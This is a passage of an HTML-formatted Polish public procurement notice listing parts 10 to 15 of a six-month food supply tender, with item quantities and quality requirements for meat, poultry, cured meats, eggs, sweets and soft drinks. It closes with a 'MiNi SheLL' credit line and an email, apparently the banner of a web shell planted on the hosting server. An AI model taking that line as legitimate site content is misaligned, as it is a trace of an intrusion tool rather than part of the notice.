                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa artykułu	Jm	Orientacyjna ilość zamówienia*

1	Boczek wp. bez kości - świeży	kg	5,00
2	Flaki wołowe parzone cięte 	kg	60,00
3	Karczek wp. bez kości - świeży	kg	40,00
4	Łopatka wp. bez kości - świeża	kg	850,00
5	Mięso mielone wieprzowo-wołowe  świeże	kg	25,00
6	Nóżki wieprzowe - świeże	kg	55,00
7	Ozory wieprzowe - świeże	kg	80,00
8	Płuca wieprzowe - świeże	kg	45,00
9	Schab wp. bez kości - świeży	kg	230,00
10	Słonina mielona - świeża	kg	35,00
11	Wołowe - extra bez kości - świeże	kg	30,00
12	Wołowe z kością  antrykot - świeże	kg	160,00
13	Żeberka wieprzowe paski - świeże	kg	110,00


Wymagania jakościowe dla mięsa wołowego, wieprzowego oraz podrobów

Mięsa i podroby winny być dostarczane świeże, o swoistej dla tej grupy produktów barwie od bladoróżowej do czerwonej. W przekroju lekko wilgotne, sok mięsny przeźroczysty. Wygląd dostarczanych artykułów typowy dla danego produktu, tj.: powierzchnia dość sucha, matowa, nie śluzowata (dopuszczalna przy podrobach). Mięsa muszą być wolne od specjalnych zabiegów polegających na wprowadzaniu do niego wody lub jakichkolwiek substancji dodatkowych. Nie mogą wykazywać objawów psucia, nieświeżości surowca, stęchnięcia lub obcych zapachów. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15110000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>11
                  
                <b>Nazwa: </b>DOSTAWA MIĘSA I PODROBÓW DROBIOWYCH <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp	Nazwa artykułu	Sugerowana waga jednostkowa	Jm.	Orientacyjna ilość zamówienia*

1	Kurczaki świeże	1300 - 1700g	kg	165,00
2	Porcje rosołowe mrożone paczkowane 	500 - 2000g	kg	350,00
3	Serca z indyka - świeże 		kg	40,00
4	Udka z kurczaka - ćwiartki świeże 	350 - 400g	kg	60,00
5	Wątróbka z kurczaka - świeża 		kg	85,00
6	Żołądki z indyka - świeże 		kg	65,00
7	Filety z kurczaka świeże		kg	130,00
8	Filety z indyka świeże		kg	30,00
9	Podudzie z kurczaka świeże 	150 - 180g	kg	320,00
10	Udziec z kurczaka b/kości, b/skóry-świeży	100 - 160g	kg	140,00
11	Udziec z kurczaka b/kości, ze skórą-świeży	120 - 180g	kg	140,00
12	Udziec z kurczaka z kością świeży 	150 - 180g	kg	30,00

Wymagania jakościowe dla mięsa i podrobów drobiowych

Mięso i podroby winny być dostarczane świeże, o swoistej dla tej grupy produktów barwie od jasno-różowej do różowej/ciemnoróżowej. W przekroju lekko wilgotne, sok mięsny przeźroczysty, bez nadmiernego wycieku. Wygląd dostarczanych artykułów typowy dla danego produktu, tj.: bez zewnętrznych krwawych wybroczyn. Mięso musi być wolne od specjalnych zabiegów polegających na wprowadzaniu do niego wody lub jakichkolwiek substancji dodatkowych. Nie mogą wykazywać objawów psucia, nieświeżości surowca, stęchnięcia lub obcych zapachów. Surowce powinny być skalibrowanej wielkości, np. udka, filety, itp.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15110000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>12
                  
                <b>Nazwa: </b>DOSTAWA WĘDLIN<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp	Nazwa artykułu	Nazwa własna#	Jm	Orientacyjna ilość         zamówienia*

1	Baleron wieprzowy gotowany (zawartość mięsa wieprzowego min. 80% )		kg	75,00
2	Blok drobiowy grubo rozdrobniony (zawartość mięsa drobiowego min. 70% )		kg	90,00
3	Blok wieprzowy grubo rozdrobniony (zawartość mięsa wieprzowego min. 70% )		kg	120,00
4	Boczek rolowany faszerowany 
( zawartość mięsa min. 70%)		kg	75,00
5	Boczek wędzony-surowy, paski, bez kości		kg	180,00
6	Filet  z indyka wędzony, pieczony-płat (mięso z indyka nierozdrobnione min.95%)		kg	60,00
7	Kiełbasa wieprzowa biała  parzona średnio rozdrobniona (zawartość mięsa min.75%)		kg	120,00
8	Kiełbasa wieprzowa podsuszana grubo rozdrobniona - kanapkowa, np.żywiecka, krakowska, oławska itp.(zawartość mięsa min.80%)		kg	120,00
9	Kiełbasa wieprzowa parówkowa drobno rozdrobniona (zawartość mięsa min.70%)		kg	230,00
10	Kiełbasa wieprzowa surowa wędzona średnio rozdrobniona (zawartość mięsa min.80% )		kg	40,00
11	Kiełbasa wieprzowa swojska wędzona, pieczona -"cienka", średnio rozdrobniona    (zawartość mięsa min.80% )		kg	180,00
12	Kiełbasa wieprzowa parzona grubo rozdrobniona - kanapkowa, np. krakowska, kminkowa, dębicka itp.(zawartość mięsa min.80%)		kg	130,00
13	Kiełbasa wieprzowa szynkowa grubo rozdrobniona (zawartość mięsa min.80%)		kg	100,00
14	Kiełbasa śląska drobiowa średnio rozdrobniona (zawartość mięsa min.70%)		kg	150,00
15	Kiełbasa śląska wieprzowa średnio rozdrobniona (zawartość mięsa min.70%)		kg	140,00
16	Kiełbasa toruńska średnio rozdrobniona (zawartość mięsa min.70%)		kg	100,00
17	Kiełbasa wieprzowa głogowska średnio rozdrobniona (zawartość mięsa min.80%)		kg	60,00
18	Kiełbasa zwyczajna średnio rozdrobniona (zawartość mięsa min.60%)		kg	150,00
19	Kiełbaski wieprzowe z serem średnio rozdrobnione, "cienkie"
( zawartość mięsa min.70% )		kg	55,00
20	Krupnioki śląskie		kg	80,00
21	Bułczanka		kg	50,00
22	Metka wieprzowa podwędzana grubo rozdrobniona		kg	65,00
23	Metka smakowa średnio rozdrobniona, np.cebulowa, tatarska, łososiowa itp.		kg	65,00
24	Mielonka drobiowa średnio rozdrobniona (zawartość mięsa min. 70%)		kg	50,00
25	Mielonka wieprzowa średnio rozdrobniona (zawartość mięsa min. 70%)		kg	65,00
26	Mortadela wieprzowa drobno rozdrobniona (zawartość mięsa min. 70%)		kg	130,00
27	Ogonówka parzona  ( zawartość mięsa min. 80%)		kg	150,00
28	Parówki  drobiowe drobno rozdrobnione (zawartość mięsa min. 70%)		kg	250,00
29	Parówki wieprzowe śląskie średnio rozdrobnione (zawartość mięsa min. 70%)		kg	230,00
30	Pasztetowa drobiowa		kg	30,00
31	Pasztetowa wieprzowa popularna		kg	50,00
32	Pasztetowa wieprzowa podwędzana		kg	55,00
33	Polędwica sopocka (zawartość mięsa min.80%)		kg	95,00
34	Polędwica z indyka średnio rozdrobniona (zawartość mięsa min.70%)		kg	55,00
35	Rolada drobiowa faszerowana (zawartość mięsa min. 70%)		kg	120,00
36	Salami wieprzowe, szlachetne drobno rozdrobnione (zawartość mięsa min. 80%)		kg	20,00
37	Salceson drobiowy grubo rozdrobniony (zawartość mięsa min. 40% )		kg	70,00
38	Salceson ozorkowy grubo rozdrobniony (zawartość podrobów wieprzowych min. 51%, w tym ozory 35% )		kg	70,00
39	Szynka drobiowa z kurczaka grubo rozdrobniona (zawartość mięsa min.70% )		kg	70,00
40	Szynka wieprzowa gotowana (zawartość mięsa min. 80%)		kg	70,00
41	Szynka wieprzowa parzona konserwowa (zawartość mięsa min. 75%)		kg	85,00
42	Indyk w galarecie (zawartość mięsa min. 50%)		kg	80,00
43	Szynka wieprzowa tradycyjna, np.wiejska, swojska, itp. (zawartość mięsa min. 85%)		kg	55,00


Wymagania jakościowe dla wędlin 

Dostarczane wędliny winny być zawsze świeże. Powierzchnia zewnętrzna wyrobów czysta, sucha lub lekko wilgotna. Konsystencja wędlin soczysta, powierzchnia przekroju lekko wilgotna, o barwie różowej lub różowo-czerwonej w przypadku wędzonek z mięsa peklowanego lub szarej w przypadku wędzonek z mięsa niepeklowanego. Smak i zapach charakterystyczny dla danego asortymentu, niedopuszczalny jest smak i zapach świadczący o nieświeżości surowca lub zapachu obcym. Wędliny/kiełbasy powinny być dostarczane z jednej partii produkcyjnej o jednorodnej wielkości. 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15131100-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>13
                  
                <b>Nazwa: </b>DOSTAWA JAJ KURZYCH<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa artykułu	Sugerowana
waga jajka	Jm	Orientacyjna ilość
Zamówienia*

1	Jaja kurze	63g-73g (L)	szt.	17 000,00

Wymagania jakościowe dla jaj kurzych 

Jaja kurze winny być dostarczane świeże, o odpowiedniej wielkości  zgodnie ze specyfikacją. Powinny posiadać nieuszkodzoną, niezdeformowaną, naturalnie czystą skorupkę. Nie mogą wykazywać obcych, nieświeżych zapachów, świadczących o zepsuciu produktu. Niedopuszczalne jest występowanie pleśni pod skorupką czy jajka z rozwijającym się zarodkiem.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>03000000-1, 03142500-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>14
                  
                <b>Nazwa: </b>DOSTAWA CZEKOLAD I WYROBÓW CUKIERNICZYCH<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>
Lp.	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna
Ilość zamówienia*

1	Biszkopty	100 - 500g	kg	20,00
2	Biszkopty	1000 - 3000g	kg	40,00
3	Bombonierka - czekoladki nadziewane# 	100-200g	kg	12,00
4	Cukierki czekoladowe (nadzienie kakaowe, orzechowe, rumowe, np. michałki itp.)		kg	10,00
5	Ciastka maślane 	800-2500g	kg	15,00
6	Ciastka deserowe-kakaowe, z cukrem, z kokosem itp.	800-2500g	kg	30,00
7	Ciastka deserowe oblewane czekoladą	800-2500g	kg	10,00
8	Ciasteczka deserowe z nadzieniem owocowym, kremowym	800-2500g	kg	15,00
9	Pierniki nadziewane w czekoladzie	800-2500g	kg	12,00
10	Biszkopty z galaretką w czekoladzie	800-1000g	kg	12,00
11	Galaretka w czekoladzie		kg	10,00
12	Praliny nadziewane (min.40% masy kakaowej)		kg	6,00
13	Czekolada mleczna (min.30% masy kakaowej)	100g	szt	50,00
14	Ciastka bez dodatku cukru	70-150g	kg	12,00
15	Zestaw wielkanocny z czekolady mlecznej (min.30%masy kakaowej)	60 -100g	kg	18,00

Wymagania jakościowe dla czekolad i wyrobów cukierniczych   
                                                                                                                                                            Czekolady i wyroby winny być dostarczane w czystych, nieuszkodzonych mechanicznie, szczelnie zamkniętych opakowaniach. Nie mogą wykazywać objawów psucia, pleśni, uszkodzenia, obcych zapachów. Nie dopuszcza się produktów zmoczonych, pogniecionych, połamanych. nadmiernie zbrylonych oraz z kończącym się terminem przydatności do spożycia. Nie uznaje się wyrobów czekoladopodobnych. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15840000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>15
                  
                <b>Nazwa: </b>DOSTAWA NAPOJÓW BEZALKOHOLOWYCH<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia*

1	Napoje owocowe pasteryzowane niegazowane min. 25% soku 	1000 - 2000ml	l	270,00
2	Soczki owocowo-warzywne 100%, przecierowe 	250 - 330ml	l	130,00
3	Soki owocowo - warzywne 100%, przecierowe 	750 - 1000ml	l	320,00
4	Sok wysokosłodzony - naturalny zagęszczony	330 - 500ml	l	30,00
5	Woda mineralna gazowana, niegazowana 	1500ml	szt	6,00
6	Soki owocowe 100% 	1000ml	l	40,00


Wymagania jakościowe dla napojów bezalkoholowych    
                                                                                                                                                            Napoje winny być dostarczane w czystych, nieuszkodzonych mechanicznie, szczelnie zamkniętych opakowaniach. Barwa i smak właściwy dla użytych owoców lub warzyw (w przypadku wody przeźroczysty). Produkty nie mogą wykazywać obcych zapachów. Nie dopuszcza się produktów potłuczonych, pogniecionych oraz z kończącym się terminem przydatności do spożycia. 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15980000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com